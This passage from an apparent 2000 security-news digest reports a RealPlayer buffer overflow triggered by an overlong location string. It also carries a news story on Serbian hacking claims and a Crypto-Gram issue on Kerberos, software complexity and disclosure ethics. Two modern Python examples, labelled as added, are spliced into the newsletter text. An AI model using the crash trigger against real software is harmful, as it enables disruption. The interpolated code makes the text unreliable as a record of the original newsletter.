      they're inviting you to take action. And if you can orchestrate it with 
      other spam victims, then you could even manufacture a denial of service 
      attack. 
      
      
      @HWA
      
      
      
216.0 HNS:Apr 4th:REALPLAYER BUFFER OVERFLOW
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNS http://www.net-security.org/

      by BHZ
      Tuesday 4 April 2000 on 8:10 AM
      There is a buffer overflow in the Win32 RealPlayer Basic client,
      versions 6 and 7. This appears to occur when >299 characters are
      entered as a 'location' to play, such as http://aaaaa..... with 300
      a's. If it is embedded in an HTML page, Internet Explorer also crashes.
      Link: Bugware
               ____________________________________________________
      
      http://net-security.org/cgi-bin/bugs/fullnews.cgi?newsid954828462,32898,
      ----------
      
      @HWA
      
217.0 ISN:Mar 18th:Serbs hacked Britain's top-secret military computers
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      

      From: William Knowles <wk@c4i.org>
      
      Sounds like complete FUD to me, But I wouldn't put it past any country
      nowadays. -WK
      
      
      http://express.lineone.net/express/00/02/27/news/n0220serb-d.html
      
      By Ken Hyder and Nick Anning
      
      Serb experts hacked into Britain's top-secret military computer systems
      during the Kosovo conflict last year, the Sunday Express has learned.
      
      In response, MI5 has been put in charge of improving Britain's defences
      against cyber attack. It is understood that both sides engaged in covert
      cyber war alongside the conventional warfare and that British agents
      successfully hacked into Serb computers.
      
      Both sides tried to plant computer viruses into military systems. The Serb
      attacks focused on computers handling the messaging systems used by the
      Ministry of Defence to communicate between headquarters in the UK and
      military units in the field.
      
      The cyber strike persuaded the Government that an all-out attack on our
      computer systems could bring the country to a standstill.
      
      Working alongside MI5 are computer experts from GCHQ in Cheltenham,
      specialist army units such as the SAS, and highly experienced private
      sector consultants. The police National Crime Squad will also be involved.
      
      A source admitted: "This kind of warfare is a deadly innovation. One
      super-hacker with just a laptop and mobile phone could wreak an amazing
      amount of damage in minutes. There are so many targets for us to defend -
      but the enemy hacker just needs to pick one and succeed."
      
      The SAS has carried out dummy attacks on key installations such as the
      National Grid and air-traffic control. Now, as well as testing out a
      location's physical defences, they take a civilian computer specialist
      with them.
      
      ISN is sponsored by Security-Focus.COM
      
      @HWA      
      
218.0 March 15th: CRYPTOGRAM newsletter
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Forwarded From: Bruce Schneier <schneier@counterpane.com>
      
      
                        CRYPTO-GRAM
      
                      March 15, 2000
      
                     by Bruce Schneier
                      Founder and CTO
             Counterpane Internet Security, Inc.
                  schneier@counterpane.com
                 http://www.counterpane.com
      
      
      A free monthly newsletter providing summaries, analyses, insights, and
      commentaries on computer security and cryptography.
      
      Back issues are available at http://www.counterpane.com.  To subscribe or
      unsubscribe, see below.
      
      
      Copyright (c) 2000 by Counterpane Internet Security, Inc.
      
      
      ** *** ***** ******* *********** *************
      
      In this issue:
            Kerberos and Windows 2000
            Counterpane -- Featured Research
            News
            AES News
            Counterpane Internet Security News
            Software as a Burglary Tool
            The Doghouse:  The Virginia Legislature
            Software Complexity and Security
            Comments from Readers
      
      
      ** *** ***** ******* *********** *************
      
                Kerberos and Windows 2000
      
      
      
      Kerberos is a symmetric-key authentication scheme.  It was developed at MIT
      as part of their Project Athena in the 1980s -- the protocol was published
      in October 1988 -- and has been implemented on various flavors of
      UNIX.  The current version is Kerberos Version 5, which corrected some
      security vulnerabilities in Version 4.  It's never taken over the
      authentication world, but it is used in many networks.  These days, the
      Internet Engineering Task Force (IETF) controls the specification for Kerberos.
      
      Kerberos is a client-server authentication protocol.  (_Applied
      Cryptography_ goes into the protocol in detail.)  For the point of this
      article, remember that there is a secure Kerberos server on a
      network.  Clients log into the Kerberos server and get secure
      "tickets."  The clients can use these tickets to log onto other servers on
      the network: file servers, databases, etc.
      
      Kerberos is now part of Microsoft Windows 2000, sort of.  The issue is that
      Microsoft has made changes to the protocol to make it noninteroperable with
      the Kerberos standard, and with any products that implement Kerberos correctly.
      
      Specifically, the incompatibility has to do with something called the "data
      authorization field" in the Kerberos messages.  All major Kerberos
      implementations leave the field blank.  The new Microsoft implementation
      does not; it uses the field to exchange access privileges between the
      Kerberos server and the client.
      
      There are two ways to look at this:
      
      o   Since the field has no specific uses in the protocol (and no one else
      uses it), the fact that Microsoft is using the protocol is harmless.
      
      o   Because Microsoft is refusing to publish details about its proprietary
      use of the field, they are harming interoperability and
      standardization.  Other Kerberos vendors cannot directly support Windows
      2000 clients.
      
      Even worse, Microsoft bypassed the IETF in this process (there's a
      procedure you're supposed to follow if you want to enhance, deviate from,
      or modify an IETF standard).
      
      On the surface, this is just nasty business practices.  If you're a company
      that has invested in a UNIX-based Kerberos authentication system and you
      want to support Windows 2000 desktops, your only real option is to buy a
      Windows 2000 Kerberos server and pay for the integration.  I'm sure this is
      what Microsoft wants.
      
      My worry is more about the security.  Protocols are very fragile; we've
      learned that time and time again.  You can't just make changes to a
      security protocol and assume the changed protocol will be
      secure.  Microsoft has taken the Kerberos protocol -- a published protocol
      that has gone through over a decade of peer review -- and has made changes
      in it that affect security.  Even worse, they have made those changes in
      secret and have not released the details to the world.
      
      Don't be fooled.  The Kerberos in Windows 2000 is not Kerberos.  It does
      not conform to the Kerberos standard.  It is Kerberos-like, but we don't
      know how secure it is.
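      The ticket exchange described above, reduced to a toy model in Python as
      an added example (this is not code from the newsletter or from any
      Kerberos implementation).  A KDC seals a ticket for a service under the
      service's long-term key, the client proves possession of the session key
      with an authenticator, and the service validates both.  The ticket
      carries the authorization-data field: a conforming service that does not
      understand its contents ignores it, while a service that insists on a
      vendor-specific entry rejects every ticket issued by a classic KDC.  The
      sealing routine (SHA-256 keystream plus HMAC) stands in for a real
      Kerberos encryption type and is for illustration only; the principal
      names, keys and the "vendor-privileges" entry type are constructed.

```python
"""Toy Kerberos-style ticket exchange: KDC, client, and two kinds of service.
Added example, not code from the newsletter or any Kerberos implementation.
The sealing routine (SHA-256 keystream plus HMAC) stands in for a real Kerberos
encryption type; names, keys and the "vendor-privileges" entry are constructed."""
import hashlib
import hmac
import json
import os
import time

def _keystream(key, nonce, length):
    blocks = (hashlib.sha256(key + nonce + i.to_bytes(4, "big")).digest()
              for i in range(length // 32 + 1))
    return b"".join(blocks)[:length]

def seal(key, payload):
    """Encrypt-then-MAC a JSON payload under key (toy stand-in for an enctype)."""
    plaintext = json.dumps(payload, sort_keys=True).encode()
    nonce = os.urandom(16)
    body = nonce + bytes(p ^ s for p, s in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return body + hmac.new(key, body, hashlib.sha256).digest()

def unseal(key, blob):
    """Check the MAC, then decrypt; ValueError if blob was not sealed under key."""
    body, tag = blob[:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, body, hashlib.sha256).digest()):
        raise ValueError("ticket integrity check failed")
    nonce, ct = body[:16], body[16:]
    return json.loads(bytes(c ^ s for c, s in zip(ct, _keystream(key, nonce, len(ct)))))

class KDC:
    """Knows every principal's long-term key and issues service tickets."""
    def __init__(self, keys):
        self.keys = keys

    def issue_ticket(self, client, service, authorization_data=None, lifetime=300):
        session_key = os.urandom(32)
        ticket = {"client": client, "service": service,
                  "session_key": session_key.hex(), "expires": time.time() + lifetime,
                  # The field the article discusses: empty in classic
                  # implementations, carrying privileges in Windows 2000.
                  "authorization_data": authorization_data or []}
        # Ticket is sealed for the service; the session key goes back to the
        # client sealed under the client's own long-term key.
        return (seal(self.keys[service], ticket),
                seal(self.keys[client], {"service": service, "session_key": session_key.hex()}))

def make_authenticator(session_key, client, now):
    """Proves the presenter holds the session key carried in the ticket."""
    msg = f"{client}|{int(now)}".encode()
    return {"client": client, "time": int(now),
            "mac": hmac.new(session_key, msg, hashlib.sha256).hexdigest()}

def service_accept(service_key, ticket_blob, authenticator, now, required_authz=None):
    """Validate as a service would; returns (accepted, reason).
    required_authz=None models a conforming service that ignores authorization
    data it does not understand; a string models a service that refuses any
    ticket lacking that vendor-specific entry (the interoperability break)."""
    try:
        ticket = unseal(service_key, ticket_blob)
    except ValueError as exc:
        return False, str(exc)
    if ticket["expires"] < now:
        return False, "ticket expired"
    if ticket["client"] != authenticator["client"]:
        return False, "client in authenticator does not match ticket"
    session_key = bytes.fromhex(ticket["session_key"])
    msg = f"{authenticator['client']}|{authenticator['time']}".encode()
    if not hmac.compare_digest(hmac.new(session_key, msg, hashlib.sha256).hexdigest(),
                               authenticator["mac"]):
        return False, "authenticator MAC invalid"
    if required_authz and not any(e.get("type") == required_authz
                                  for e in ticket["authorization_data"]):
        return False, "missing required authorization-data entry: " + required_authz
    return True, "ok"

def run_demo():
    """Constructed scenario: classic and extended tickets against two kinds of service."""
    keys = {"alice": os.urandom(32), "fileserver": os.urandom(32)}
    kdc, now = KDC(keys), time.time()

    def present(ticket, reply, required=None):
        session_key = bytes.fromhex(unseal(keys["alice"], reply)["session_key"])
        auth = make_authenticator(session_key, "alice", now)
        return service_accept(keys["fileserver"], ticket, auth, now, required)

    classic, reply1 = kdc.issue_ticket("alice", "fileserver")   # field left empty
    extended, reply2 = kdc.issue_ticket("alice", "fileserver", authorization_data=[
        {"type": "vendor-privileges", "groups": ["staff"]}])
    tampered = classic[:-1] + bytes([classic[-1] ^ 1])          # flip a MAC bit
    return {"classic_at_conforming": present(classic, reply1),
            "classic_at_strict": present(classic, reply1, "vendor-privileges"),
            "extended_at_conforming": present(extended, reply2),
            "tampered": present(tampered, reply1)}
```

      run_demo() returns the verdicts for four cases: a classic (empty-field)
      ticket at a conforming service, the same ticket at a service that requires
      the vendor entry, an extended ticket at a conforming service, and a ticket
      whose MAC has been altered.  The extended ticket being accepted by the
      conforming service is the harmless direction the first bullet describes;
      the classic ticket being refused by the strict service is the break the
      second bullet describes.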
      
      Kerberos Web page:
      <http://www.isi.edu/gost/gost-group/products/kerberos/>
      
      IETF Specification:
      <ftp://ftp.isi.edu/in-notes/rfc1510.txt>
      <ftp://athena-dist.mit.edu/pub/kerberos/doc/techplan.txt>
      
      Microsoft Kerberos information:
      Windows 2000 Kerberos Authentication white paper --
      <http://www.microsoft.com/windows2000/library/howitworks/security/kerberos.asp>
      Introduction to Windows 2000 Security Services --
      <http://www.microsoft.com/WINDOWS2000/guide/server/features/secintro.asp>
      Guide to Kerberos Interoperability --
      <http://www.microsoft.com/windows2000/library/planning/security/kerbsteps.asp>
      Article by David Chappell about Kerberos and Windows 2000 --
      <http://www.microsoft.com/msj/defaulttop.asp?page=/msj/0899/kerberos/kerberostop.htm>
      
      
      ** *** ***** ******* *********** *************
      
             Counterpane -- Featured Research
      
      
      
      "A Performance Comparison of the Five AES Finalists"
      
      B. Schneier and D. Whiting, Third AES Candidate Conference, 2000, to appear.
      
      In 1997, NIST announced a program to develop and choose an Advanced
      Encryption Standard (AES) to replace the aging Data Encryption Standard
      (DES).  NIST chose five finalists in 1999.  We compare the performance of
      the five AES finalists on a variety of common software platforms: current
      32-bit CPUs (both large microprocessors and smaller, smart card and
      embedded microprocessors) and high-end 64-bit CPUs.  Our intent is to show
      roughly how the algorithms' speeds compare across a variety of CPUs.  Then,
      we give the maximum rounds cryptanalyzed for each of the algorithms, and
      re-examine all the performance numbers for these variants. We then compare
      the algorithms again, using the minimal secure variants as a way to more
      fairly align the security of the five algorithms.
      
      <http://www.counterpane.com/aes-comparison.html>
      
      
      ** *** ***** ******* *********** *************
      
                           News
      
      
      
      More commentary on the ethics of publicizing vulnerabilities:
      <http://boardwatch.internet.com/mag/99/oct/bwm62.html>
      <http://cgi.zdnet.com/slink?22157:8469234>
      
      An opinion on DDoS attacks and the CD Universe fiasco:
      <http://www.osopinion.com/Opinions/GaryMurphy/GaryMurphy7.html>
      
      There's a new DSS standard:
      Text --
      <http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=2000_register&docid=00-3450-filed>
      PDF --
      <http://frwebgate.access.gpo.gov/cgi-bin/getdoc.cgi?dbname=2000_register&docid=00-3450-filed.pdf>
      
      BAIT, DIRT, and other law-enforcement hacker tools.  Some of the PR fluff
      sounds too good to be true.
      <http://www.codexdatasystems.com/>
      
      H&R Block insecurity:
      <http://news.cnet.com/news/0-1005-200-1550948.html?tag=st.ne.1002.tgif?st.nefd.gif.d>
      
      The worst security product is the one that isn't used.  Here are the
      results of a PGP usability study.  Most people can't figure out how to use
      it.  Some sent e-mail out unencrypted, believing it was secure.
      <http://www.wired.com/news/news/business/story/21484.html>
      <http://www.cs.cmu.edu/~alma/johnny.pdf>
      
      Novell published a "security flaw in MS Active Directory Services" the day
      before the MS launch of Windows 2000.  Microsoft published a response
      shortly thereafter.  Both documents are full of marketing spin.  Russ
      Cooper has written an objective description of the non-issue:
      <http://ntbugtraq.ntadvice.com/NDSvsADS-01.asp>
      
      Good security software:  a command-line tool for statically scanning C and
      C++ source code for security vulnerabilities.  It's called ITS4.
      <http://www.rstcorp.com/its4/>
      
      Mixter's paper on cracking:
      <http://mixter.void.ru/crack.txt>
      
      Excellent essay on the difference between hackers and vandals:
      <http://www.villagevoice.com/issues/0007/thieme.shtml>
      
      Commentaries on distributed denial-of-service attacks:
      <http://www.pbs.org/cringely/pulpit/pulpit20000217.html>
      <http://www.thenation.com/issue/000313/0313klein.shtml>
      
      Usernames and passwords for sale:
      <http://www.wired.com/news/politics/0,1283,34515,00.html?tw=wn20000224>
      
      Sony PlayStation 2 is being held up for export (from Japan) due to crypto
      in the system:
      <http://www.theregister.co.uk/000302-000026.html>
      
      Navajo code-talking GI Joe doll:
      <http://www.gijoe.com/lnavajo_code_talker.html>
      
      More speculation about Echelon:
      <http://www.zdnet.com/enterprise/stories/security/news/0,7922,2455560,00.html>
      <http://www.wired.com/news/politics/0,1283,34932,00.html>
      
      Interesting use of a honey pot by the San Diego Supercomputer Center (or,
      SDSC Hacks the Hackers):
      <http://security.sdsc.edu/incidents/worm.2000.01.18.shtml>
      
      
      ** *** ***** ******* *********** *************
      
                          AES News
      
      
      
      The big AES news is the week of 10-14 April, 2000, in New York.  Monday,
      Tuesday, and Wednesday are the 7th Fast Software Encryption workshop (FSE
      2000).  Thursday and Friday are the 3rd AES Candidate Conference
      (AES3).  Both are in the New York Hilton and Towers.  FSE 2000 will have
      several excellent papers on the AES candidates (new attacks on MARS, RC6,
      Rijndael, and Serpent), and AES3 will have nothing but.  The papers for FSE
      2000 have been selected, and are listed on the Web site.  The papers for
      AES3 have not been announced yet.  (The submission deadline for both
      conferences is long past.)
      
      Come, be a part of cryptography history.  It'll be fun.
      
      FSE 2000:
      <http://www.counterpane.com/fse.html>
      
      AES3:
      <http://csrc.nist.gov/encryption/aes/round2/conf3/aes3conf.htm>
      
      
      ** *** ***** ******* *********** *************
      
            Counterpane Internet Security News
      
      
      
      Bruce Schneier was interviewed in Business Week:
      <http://www.businessweek.com/2000/00_10/b3671089.htm>
      
      
      ** *** ***** ******* *********** *************
      
      
                Software as a Burglary Tool
      
      
      
      This is a weird one.  Two people in Minneapolis who allegedly stole
      information from their employers were charged with the possession of a
      "burglary tool" -- L0phtcrack, the program that automatically breaks
      Windows passwords.
      
      The ramifications of this are unclear.  There are some burglary tools that
      you can't carry unless you are a licensed professional (certain lockpicking
      tools, for example); just having them is illegal.  But screwdrivers and
      bolt cutters can also be burglary tools if they are used with the intent to
      commit a crime.
      
      What it means to me is that the law is getting serious about this.
      
      <http://www.channel4000.com/news/stories/news-20000217-164727.html?&_ref=1005006010>
      
      
      ** *** ***** ******* *********** *************
      
          The Doghouse:  The Virginia Legislature
      
      
      
      They recently passed the Uniform Computer Information Transactions Act
      (UCITA).  It's deeply disturbing.  It could be subtitled "The Software
      Industry Wish List" for the amount of control (and absence of
      accountability) it gives UNDER LAW to software distributors.
      
      Under the UCITA, Microsoft not only doesn't have to fix any of the 63,000
      Windows 2000 bugs, it wouldn't even have to tell you any of them
      existed.  It could also disable the OS of anyone it wants for essentially
      any reason it wanted (e.g., failing to abide by the license terms which
      restrict you from any public mention of apparent bugs in the software).
      
      The governor has not signed the bill into law yet, but he is expected to.
      
      <http://www.lawnewsnetwork.com/practice/techlaw/news/A16380-2000Feb16.html>
      <http://www4.zdnet.com:80/intweek/stories/news/0,4164,2436874,00.html>
      <http://www.computerworld.com/home/print.nsf/CWFlash/000215ECDA>
      <http://www.cnn.com/2000/TECH/computing/03/07/ucita.idg/index.html>
      
      
      ** *** ***** ******* *********** *************
      
              Software Complexity and Security
      
      
      
      The future of digital systems is complexity, and complexity is the worst
      enemy of security.
      
      Digital technology has been an unending series of innovations, unintended
      consequences, and surprises, and there's no reason to believe that will
      stop anytime soon.  But there is one thing that has held constant through
      it all, and it's that digital systems have gotten more complicated.
      
      We've seen it over the past several years.  Microprocessors have gotten
      more complex.  Operating systems have gotten more complex.  Computers have
      gotten more complex.  Networks have gotten more complex.  Individual
      networks have combined, further increasing the complexity.  I've said it
      before, but it's worth repeating:  The Internet is probably the most
      complex machine mankind has ever built.  And it's not getting any simpler
      anytime soon.
      
      As a consumer, I think this complexity is great.  There are more choices,
      more options, more things I can do.  As a security professional, I think
      it's terrifying.  Complexity is the worst enemy of security.  This has been
      true since the beginning of computers, and is likely to be true for the
      foreseeable future.  And as cyberspace continues to get more complex, it
      will continue to get less secure.  There are several reasons why this is true.
      
      The first reason is the number of security bugs.  All software contains
      bugs.  And as the complexity of the software goes up, the number of bugs
      goes up.  And a percentage of these bugs will affect security.
      
      The second reason is the modularity of complex systems.  Complex systems
      are necessarily modular; there's no other way to handle the complexity than
      by breaking it up into manageable pieces.  We could never have made the
      Internet as complex and interesting as it is today without modularity.  But
      increased modularity means increased security flaws, because security often
      fails where two modules interact.
      
      We've already seen examples of this as everything becomes
      Internet-aware.  For years we knew that Internet applications like sendmail
      and rlogin had to be secure, but the recent epidemic of macro viruses shows
      that Microsoft Word and Excel need to be secure.  Java applets not only
      need to be secure for the uses they are intended, they also need to be
      secure for any other use an attacker might think of.  Photocopiers,
      maintenance ports on routers, mass storage units: these can all be made
      Internet-aware, with the associated security risks.  Rogue printer drivers
      can compromise Windows NT.  Malicious e-mail attachments can tunnel through
      firewalls.  Convenience features in Microsoft Outlook can compromise security.
      
      The third reason is the increased testing requirements for complex
      systems.  I've talked elsewhere about security and failure testing.  The
      only reasonable way to test the security of a system is to perform security
      evaluations on it.  However, the more complex the system is, the harder a
      security evaluation becomes.  A more complex system will have more
      security-related errors in the specification, design, and
      implementation.  And unfortunately, the number of errors and the difficulty
      of evaluation does not grow in step with the complexity, but in fact grows
      much faster.
      
      For the sake of simplicity, let's assume the system has ten different
      settings, each with two possible choices.  Then there are 45 different
      pairs of choices that could interact in unexpected ways, and 1024 different
      configurations altogether.  Each possible interaction can lead to a
      security weakness, and must be explicitly tested.  Now, assume that the
      system has twenty different settings.  This means 190 different pairs of
      choices, and about a million different configurations.  Thirty different
      settings means 435 different pairs and a billion different
      configurations.  Even slight increases in the complexity of systems mean an
      explosion in the number of different configurations . . . any one of which
      could hide a security weakness.
      
      The increased number of possible interactions creates more work during the
      security evaluation.  For a system with a moderate number of options,
      checking all the two-option interactions becomes a huge amount of
      work.  Checking every possible configuration is effectively
      impossible.  Thus the difficulty of performing security evaluations also
      grows very rapidly with increasing complexity.  The combination of
      additional (potential) weaknesses and a more difficult security analysis
      unavoidably results in insecure systems.
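      The arithmetic above, carried out in Python as an added example (not from
      the original essay), together with one step beyond it: a greedy
      construction of a 2-way covering set, which is the cheapest systematic way
      to exercise every pair of settings in every combination of values.  The
      settings are modelled as anonymous booleans; nothing here is a real
      product's configuration.

```python
"""Counting and covering pairwise setting interactions.
Added example, not from the original essay.  Each setting is a boolean with two
choices; interaction_counts() gives the pair and full-configuration counts the
essay quotes, and pairwise_cover() builds a small set of configurations that
still exercises every pair of settings in all four value combinations."""
import itertools
import random
from math import comb

def interaction_counts(n_settings):
    """(number of setting pairs, number of full configurations) for n boolean settings."""
    return comb(n_settings, 2), 2 ** n_settings

def all_pair_values(n_settings):
    """Every (i, j, value_i, value_j) that a 2-way evaluation must exercise."""
    return {(i, j, vi, vj)
            for i, j in itertools.combinations(range(n_settings), 2)
            for vi in (0, 1) for vj in (0, 1)}

def pairs_in(config):
    """The pair-value combinations that one configuration exercises."""
    return {(i, j, config[i], config[j])
            for i, j in itertools.combinations(range(len(config)), 2)}

def pairwise_cover(n_settings, candidates=64, seed=0):
    """Greedy 2-way covering: add the random candidate covering most uncovered pairs.
    If no candidate adds coverage, a configuration is built from one uncovered
    pair directly, so every iteration makes progress and the loop terminates."""
    rng = random.Random(seed)          # seeded so the result is reproducible
    uncovered = all_pair_values(n_settings)
    cover = []
    while uncovered:
        best, best_gain = None, 0
        for _ in range(candidates):
            cand = tuple(rng.randint(0, 1) for _ in range(n_settings))
            gain = len(pairs_in(cand) & uncovered)
            if gain > best_gain:
                best, best_gain = cand, gain
        if best is None:
            i, j, vi, vj = next(iter(uncovered))
            cfg = [0] * n_settings
            cfg[i], cfg[j] = vi, vj
            best = tuple(cfg)
        cover.append(best)
        uncovered -= pairs_in(best)
    return cover

def is_pairwise_complete(n_settings, configs):
    """True if the configurations together exercise every pair-value combination."""
    covered = set()
    for cfg in configs:
        covered |= pairs_in(cfg)
    return all_pair_values(n_settings) <= covered

def untested_configurations(n_settings, configs):
    """How many full configurations a test set leaves unexamined."""
    return 2 ** n_settings - len(set(configs))
```

      The covering set for ten settings is a handful of configurations rather
      than 1024, but building it already requires explicit bookkeeping over all
      180 pair-value combinations, and untested_configurations() shows how much
      of the full space a pairwise evaluation still never looks at; a weakness
      that only appears when three or more options line up is outside it
      entirely.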
      
      The fourth reason is that the more complex a system is, the harder it is to
      understand.  There are all sorts of vulnerability points -- human-computer
      interface, system interactions -- that become much larger when you can't
      keep the entire system in your head.
      
      The fifth (and final) reason is the difficulty of analysis.  The more
      complex a system is, the harder it is to analyze.  Everything is more
      complicated: the specification, the design, the implementation, the
      use.  And as we've seen again and again, everything is relevant to
      security analysis.
      
      A more complex system loses on all fronts.  It contains more weaknesses to
      start with, its modularity exacerbates those weaknesses, it's harder to
      test, it's harder to understand, and it's harder to analyze.
      
      It gets worse:  This increase in the number of security weaknesses
      interacts destructively with the weakest-link property of security: the
      security of the overall system is limited by the security of its weakest
      link.  Any single weakness can destroy the security of the entire system.
      
      Real systems show no signs of becoming less complex.  In fact, they are
      becoming more complex faster and faster.  Microsoft Windows is a poster
      child for this trend to complexity.  Windows 3.1, released in 1992, had 3
      million lines of code; Windows 95 has 15 million and Windows 98 has 18
      million.  The original Windows NT (1993) had 4 million lines of code;
      NT 4.0 (1996) has 16.5 million.  In 1998, Windows NT 5.0 was estimated to
      have 20 million lines of code; by the time it was renamed Windows 2000 (in
      1999) it had between 35 million and 60 million lines of code, depending on
      who you believe.  (As points of comparison, Solaris has held pretty stable
      at about 7 to 8 million lines of code for the last few releases, and Linux,
      even with the addition of the X Window System and Apache, is still under 5
      million lines of code.)
      
      The size of Windows 2000 is absolutely amazing, and it will have more
      security bugs than Windows NT 4.0 and Windows 98 combined.  In its defense,
      Microsoft has claimed that it spent 500 people-years to make Windows 2000
      reliable.  I only reprint this number because it will serve to illustrate
      how inadequate 500 people-years is.
      
      The networks of the future, necessarily more complex, will be less
      secure.  The technology industry is driven by demand for features, for
      options, for speed.  There are no standards for quality or security, and
      there is no liability for insecure software.  Hence, there is no economic
      incentive to create high quality.  Instead, there is an economic incentive
      to create the lowest quality the market will bear.  And unless customers
      demand higher quality and better security, this will never change.
      
      I see two alternatives.  The first is to recognize that the digital world
      will be one of ever-expanding features and options, of ever-faster product
      releases, of ever-increasing complexity, and of ever-decreasing
      security.  This is the world we have today, and we can decide to embrace it
      knowingly.
      
      The other choice is to slow down, to simplify, and to try to add
      security.  Customers won't demand this -- the issues are too complex for
      them to understand -- so a consumer advocacy group is required.  I can
      easily imagine an FDA-like organization for the Internet, but it can take a
      decade to approve a new prescription drug for sale, so this solution might
      not be economically viable.
      
      I repeat: complexity is the worst enemy of security.  Secure systems should
      be cut to the bone and made as simple as possible.  There is no substitute
      for simplicity.
      
      Unfortunately, simplicity goes against everything our digital future stands
      for.
      
      
      ** *** ***** ******* *********** *************
      
                    Comments from Readers
      
      
      
      From: Shawn Hernan <svh@cert.org>
      Subject: Full Disclosure
      
      I was intrigued by your recent series of editorials in Crypto-Gram
      regarding full-disclosure, and especially, CERT.  I am writing to respond
      to the article.
      
      Some of your criticisms of CERT are valid, and I agree with them; but I
      wanted to point out a couple of things that you may not realize about our
      current practices.
      
      When deciding what to publish and when, we use a variety of different criteria.
      
      First, whatever we publish has to be *true* -- we go to great lengths to
      validate and verify everything we say in an advisory, and you can imagine
      some of the arguments that ensue over what is "true."
      
      Second, as a rule of thumb, our advisories are generally about very serious
      problems.  We have a formal metric that we use to attempt to put
      vulnerabilities on a linear scale of "severity" and we use that as a
      first-order estimate of the gravity of the problem, and use our experience
      as the final judge.  Generally, the problems issued in advisories are in
      the 90th percentile of this scale (internally called the "threat metric").
      
      Third, although it may have been true in the past, it has never been the
      case in my time here (about 4 years now) that our publication schedule was
      dependent on all (or even any) of the fixes being available.  We certainly
      prefer to have fixes available at publication time, but if we discover that
      a vulnerability is being exploited we will publish regardless of the
      availability of any fixes or patches.  My team (the vulnerability handling
      team) works very closely on a daily basis with the incident response team
      to understand if a vulnerability is being exploited.
      
      Given all that, I am trying to find responsible, practical ways to publish
      more information about vulnerabilities in a variety of forms.  We are a
      relatively small organization, and I'm not willing to sacrifice truth for
      expediency.
      
      
      From: Ryan Russell <ryan@securityfocus.com>
      Subject: Distributing Exploits
      
      You're still not totally consistent in what you say:
      
        >Third, I believe that it is irresponsible, and possibly
        >criminal, to distribute exploits.
      
      You've already acknowledged that that's what it takes to get action.
      
        >Reverse-engineering security systems, discovering
        >vulnerabilities, and writing research papers about them
        >benefits research; it makes us smarter at designing secure
        >systems. Distributing exploits just make us more vulnerable.
      
      You acknowledge your behavior being inconsistent with your words, which is
      neither here nor there.  It not only often takes an exploit, but it takes a
      press release sometimes.  Thievco released an "exploit" to decode Netscape
      passwords a year and a half ago.  Netscape did nothing.  RST Corp. did the
      same, with a press release.  That got Netscape's attention.
      
        >For example, Mixter is a German hacker who wrote the
        >Tribal Flood Network tool used in some of the distributed
        >denial-of-service attacks. I believe he has a lot to answer
        >for. His attack tool served no good.
      
      Not true.  Were it not for him, we'd probably be looking at mystery tools
      that were being used that we didn't have the source for, and couldn't as
      easily analyze.  Mixter has combated much FUD by showing us exactly the
      type of thing that can be used, so that the reporters couldn't run off and
      tell the public that the evil hackers have superweapons the security
      experts know nothing about.
      
        >It enabled criminals and cost a lot of companies a lot of
        >money. Its existence makes networks less secure.
      
      As you say, like any tool, it enables both good and bad guys.  As you've
      pointed out, the security problem was already there, the tools just
      highlight it.
      
      Let me speak to the subtext of your rant against Mixter.  Some people think
      Mixter may deserve some punishment.  I don't, but I can see some of the
      logic.  Really, I think if anyone deserves punishment, it's the guys who
      used the tool.
      
      Did Mixter and even the attackers actually do anything in the spirit of
      full disclosure?  Yes.
      
      We've been complaining for years about the spoofing problem, and expecting
      ISPs to do filtering.  Nothing has happened.  Mixter put out his
      tool.  Some meetings to discuss DDoS happened.  No actual change to
      behavior, but there was some amount of advanced planning, which was good
      preparation.  Finally, some person (yes, criminal) put their neck on the
      line and actually used them.  They didn't take down the security sites to
      make them look bad.  They didn't go after the government.  They went after
      e-commerce, which I have to assume was designed for maximum reaction.
      
      I think we'll get some action now.
      
      
      From: Brian Bartholomew <bb@wv.com>
      Subject: Publishing exploits
      
        > Second, I believe in giving the vendor advance notice.  CERT took
        > this to an extreme, sometimes giving the vendor years to fix the
        > problem.  I'd like to see the researcher tell the vendor that he
        > will publish the vulnerability in a month, or three weeks (no fair
        > giving the vendor just seven days to fix the problem).  Hopefully
        > the vulnerability announcement can occur at the same time as the
        > patch announcement.  This benefits everybody.
      
      Whatever CERT's motivations were, they had the effect of increasing user
      trust (because a new sheriff is in town) while decreasing trustability
      (because they sat on vulnerabilities users handed off to them).  This is
      backwards, in two places.
      
      I prefer the following approach: announce existence of vulnerability and
      promise a kiddy script in a month; wait a month for vendor to react;
      publish kiddy script.
      
        > Publishing vulnerabilities in critical systems that cannot be easily
        > fixed and whose exploitation will cause serious harm (e.g., the air
        > traffic control system) is bad.
      
      Publishing is *very important* in these cases so the stakeholders know to
      reduce their trust in these systems.  If air traffic control is vulnerable,
      tell me so I can stop taking airplanes!
      
      A non-life-safety version of this problem was the publishing of a script
      that gave an existing process root privileges using the memory debugger
      abilities of the console monitor ("L1-A") of a Sun.  This debugger could be
      disabled, but nobody did because it disabled the software reset
      button.  This reported vulnerability allowed users to adjust their trust of
      the security of root sharply downward, corresponding more closely to the
      actual security of it in practice.
      
        > Third, I believe that it is irresponsible, and possibly criminal, to
        > distribute exploits.
      
      This is gun control: "Don't punish murder, ban the gun instead!  Exploits
      are an evil instrumentality!  Exploits help a good boy go bad!"  The right
      answer is: Humans are held responsible for their behavior.  Guns, bricks,
      and exploits are just tools.
      
      
      From: Greg Guerin <glguerin@amug.org>
      Subject: publicity attack loops?
      
      I have to admit that I was chuckling all the way through the
      Fernandes/Cryptonym letter in the Feb 2000 Crypto-Gram.  Especially when at
      the end he wraps himself in the mantle of professional integrity.  I've
      already written two essays on the Fernandes discovery and his downloadable
      "repair" ZIP:
          <http://amug.org/~glguerin/opinion/win-nsa-key.html>
          <http://amug.org/~glguerin/opinion/crypto-repair-kit.html>
      
      Though neither one is about Fernandes's professional integrity, per se,
      they do make a number of points about specific practices.  To summarize the
      points (see the essays for the full explanation):
      
          1) the ZIP held 2 EXE's, 2 DLL's, and 1 source file.
          2) the downloadable ZIP had no digital signature.
          3) nothing within the ZIP had a separate digital signature.
          4) Fernandes's PGP key had no introducers at all.
